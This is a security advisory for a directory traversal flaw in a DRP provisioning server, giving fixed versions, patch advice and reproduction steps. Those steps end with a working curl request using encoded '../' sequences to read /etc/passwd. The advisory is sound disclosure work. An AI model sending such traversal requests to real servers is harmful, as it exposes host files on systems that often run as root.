CVE-2020-0924a¶
Security (Web requests can navigate outside DRP controlled areas (CVE-20200924a))
Summary¶
DRP server incorrectly respects using ..
for navigation if resulting path is outside managed areas. This potentially
allowed bad actors to access the host file system.
- Classification: Directory Traversal
- Reported: Sept 24, 2020
- Fixed: Sept 24, 2020
- Addressed In: v4.5, v4.4.7, v4.3.8, v4.2.17
Recommendation¶
Users are advised to apply this patch as soon as possible. Patching involves replacing the DR-SERVER binary that closes matches the currently deployed version.
Mitigation¶
Code was added to prevent out of bounds navigation.
Steps to reproduce¶
docker run --rm -it ubuntu /bin/bash
apt update && apt install -y curl
cd /opt
mkdir drp ; cd drp
curl -fsSL get.rebar.digital/stable | bash -s -- --isolated install
./dr-provision --base-root=`pwd`/drp-data --local-content="" --default-content="" > drp.log 2>&1 &
curl -k https://127.0.0.1:8092/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
The above results on the contents of /etc/passwd being shown. This is particularly bad given that this application generally runs as root.